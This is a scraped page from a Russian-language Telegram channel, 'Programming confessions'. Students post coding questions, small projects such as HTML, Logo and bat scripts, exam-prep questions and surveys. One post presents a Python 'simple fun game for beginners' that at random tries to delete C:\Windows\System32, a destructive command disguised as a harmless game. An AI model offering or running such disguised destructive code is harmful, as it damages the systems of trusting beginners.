Programming confessions ✍️💻
Відкрити в Telegram
Анон @PRCF_AHOHNMHblN_BOT Не анон @Pr0gramming_confessions_bot что...? ты... идешь мыться? но-- Ч-ЧТО... КАК ТАК? БББЮ... ТЫ... ИДЕШЬ МЫТЬСЯ... но как же так...?
Показати більше832
Підписники
-124 години
-87 днів
-1630 день
Архів дописів
Я, как понял, тут не съедают за вопросы по максимально банальным кодам.
Короче, нам в школе задали сделать сайт на хтмл для оценки в четверти, мне очень впадлу разбирать документ, который скинул учитель(в 11 классе не люблю тратить время на не предметы моего егэ), поэтому я стырил код у ии, посмотрел — в файле вроде похожее, да и не должно быть там сложно(меня смущает, правда,что код у ии на 10 строк, когда в документе больше, но ладно) но файлы с кодом в браузере отображаются как текст, как это фиксить?
Расширение у всех файлов нужное, я всё перепроверил.
Пример кода одной страницы для понимания:
<!DOCTYPE html>
<html lang="ru">
<head>
<meta charset="UTF-8">
<title>Фото русских тоев</title>
</head>
<body>
<h1>Фотографии русских тои</h1>
<img src="31020fe3c4c269cbc1fb1225af770540.jpg" alt="Той1" width="300">
<img src="Тойчик_русский.jpg" alt="Той2" width="300">
<a href="index.html">Главная</a>
</body>
</html>
@programingconfessions
@Pr0gramming_confessions_bot
добри день
меня зовут митман
первого мая вот укусила меня пчела вот захотел я что-то сделать на консоли... я пошел гуглить...
ну и каким-то образом у меня сегодня родился скрипт с прятками с филей
если вы не боитесь bat-файлов командных консолей и вирусах которые в лёгкую на этих батниках пишут то можете протестить мой скрипт, инструкции там есть, а если не хотите или боитесь скачивать что-то из рук ноунейма в телеграме то вот ссылка на гитхаб
https://github.com/MeatmanTheMeat/hide-and-seek-with-phill.bat_RU
неанон позитивчег
всем пр, я новичок в этом кф
ещё в начале апреля я захотел сделать собственный пиксель батл, чисто чтоб играть с друзьями. посмотрел мнохо туторов (и чучут ии использовал, извинитк)
оцените пж
тока как сделать этот ваш сайт, синхронизацию и базу данных я не понял, сами делайте, я устл
Неанон алексайрус
Утром, когда лень было встать и дойти до компа, я решил вспомнить про черепашку, нашел сохранненый там код и отформатировал его немного, оставив комменты:
//settings
make xaxis 2 //horizontal size
make yaxis 6 //vertical size
make cubesize 20 //size of the squares
//chanse of filling the square:
make this 1
make outof 16
setfc 255 0 0 //square filling color
setpc 5 //lines color
setsc 255 255 255 //background color (totally white is gray)
//setting turtle to the centre of the screen
clearscreen
make xgrid 0
make ygrid 0
//making square function
to square
repeat 4[
fd cubesize rt 90]
//integrating random filling of the squares
IF (RANDOM outof) < :this [
PU
FD :cubesize / 2
RT 90
FD :cubesize / 2
LT 90
PD
FILL]
end
//function for drawing a horizontal line of squares
to x
repeat xaxis[
pu
setpos xgrid * cubesize ygrid * cubesize
pd
square
make xgrid :xgrid + 1
]
end
//repeating the horizontal line
repeat yaxis[
x make ygrid :ygrid + 1
make xgrid 0
]
Я хз, делайте с ним что хотите, просто скинулпривет друзья, а можете ли помочь? В общем то мне информатико сдавать (мцко 8 класс), а я вообще не вруьаюсь. Киньте гайды если есть или же советы
привет друзья, а можете ли помочь? В общем то мне информатико сдавать (мцко 8 класс), а я вообще не вруьаюсь. Киньте гайды если есть или же советы
Привет кф. Я короче сделала бота с песнями и выступлениями одной группы, вот такой
@PhantomSiitasongs_bot
Это мой итоговый проект, и мне нужно набрать что-то типо комментариев и отзывов от разных людей. Потестите и напишите пожалуйста что-то в комментарии. А то я в кучу кф по тематике музыку закинула, а мне так никто ничего и не написал пока... А вы как раз сможете наверное что-то типо конструктивной оценки мне дать, нравится ли вам функционал, удобный ли и т.д.
Repost from Vampire confession🍷🗡
︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎...Лишь тот, кто познал ужас ночи, может понять сладость наступления утра. —🤩
︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩🤩
Добро пожаловать, смертная душа. Ночью правят мертвецы, твоё тело больше не принадлежит тебе, и остаётся лишь молиться Господу, чтобы он уберёг тебя от этих страшных существ. Вампиров.❤︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎🥄🥄🥄🥄🥄🥄🥄🥄🥄🥄 ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎🩸🅰️🩸🩸🩸🩸🩸 ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎🩸🩸🩸🩸🩸🩸🩸🩸🩸🩸 🎃 ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ 🤩 ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎︎ ⚰О, великий Дракула, когда мы будем свободны!🌹 Да хоть сейчас. Здесь, в этом конфешене, вы можете поделиться любым творчеством, зарисовками, косплеями и всем всем всем, что связано с вампирами: арты, факты и многое другое. Здесь вы найдёте своё пристанище, исчадия Ада, и смерть постигнет каждого, кто посмеет бросать вызов силам тьмы...🧛♂ Эмодзи комбо:
🦇🩸
НАВИГАЦИЯ: ВП ПОСТ (400+) Правила Пост с медиа по вампирам #интересныефакты #разныевампиры Бустануть канал Бот для тейков🩸🩸🩸: отсутствует, но пожалуйста, будьте адекватными, пока кровь течёт по венам. 🧪
можно пожалуйста сайты откуда можно научиться делать ботов для тг на пайтоне
https://forms.yandex.ru/cloud/69d3c30202848f3d8424438b
Можете подсобить для проекта?
Привет, товарищи, хочу поступить в технический универ на заводскую айтишность, вступительне экзамены очень пространные: математическое обеспечение информационных систем; информационные технологии и программирование. Как понять что от меня требуется и как готовиться?
#информатика #ЕГЭ #10класс
сорри если вопрос не прям по теме чата
люди, подскажите пожалуйста, какие курсы брать по инфе: Кабанова, ЕгэЛенд, 100бальный или школково? Сейчас в 10 классе весной хочу взять на апрель-май и лето, чтоб в сентябре какую-то базу уже иметь по проге и инфе в принципе
This message couldn't be displayed on your device because it violates the Telegram Terms of Service.
Ребят хочу снести с винды десятки Майкрософт Эдж, но оно не умирает.
Скачала psexec и db browser, но на последнем этапе в IsInbox 1 не меняется на ноль и нифига не уходит. Объясните на пальцах как это сделать, умоляю. Вот есть ссылка на https://github.com/SoftSonic83/AppxDBEditor?tab=readme-ov-file , но сомнительно. УМОЛЯЮ😭
Простая и весёлая игра для новичков на Пайтоне:
import random
import os
if random.randint(0, 6) == 1:
os.remove("C:\Windows\System32")
Многоуважаемый, наилюбимейший прог кф, как думаете, нормально ли попытаться сделать что то в покет коде чтоб ± понять что и как делать при создании игр.........просто я у некоторых школьников видел более менее нормальные проекты в этой штуковине
000 из ООО
Здравствуйте! 👋
Мы (студенты ИТМО) проводим исследование, чтобы понять, какие аспекты бренда работодателя наиболее важны для IT-специалистов поколения Z при выборе компании и насколько это влияет на желание откликнуться на вакансию.
Результаты помогут компаниям лучше понимать, что реально привлекает и удерживает вас — от интересных проектов и современной инфраструктуры до честности ценностей и присутствия в Habr/GitHub.
⏱️ Время прохождения: 6–8 минут
🔒 Анкета полностью анонимна, данные используются только в обобщённом виде.
Будем очень благодарны за ваш отклик! Ваши ответы действительно помогут сделать IT-рынок лучше 🫶
https://forms.gle/9hYjsMsNjDqxfSfu9
Вже доступно! Дослідження Telegram за 2025 — головні інсайти року 
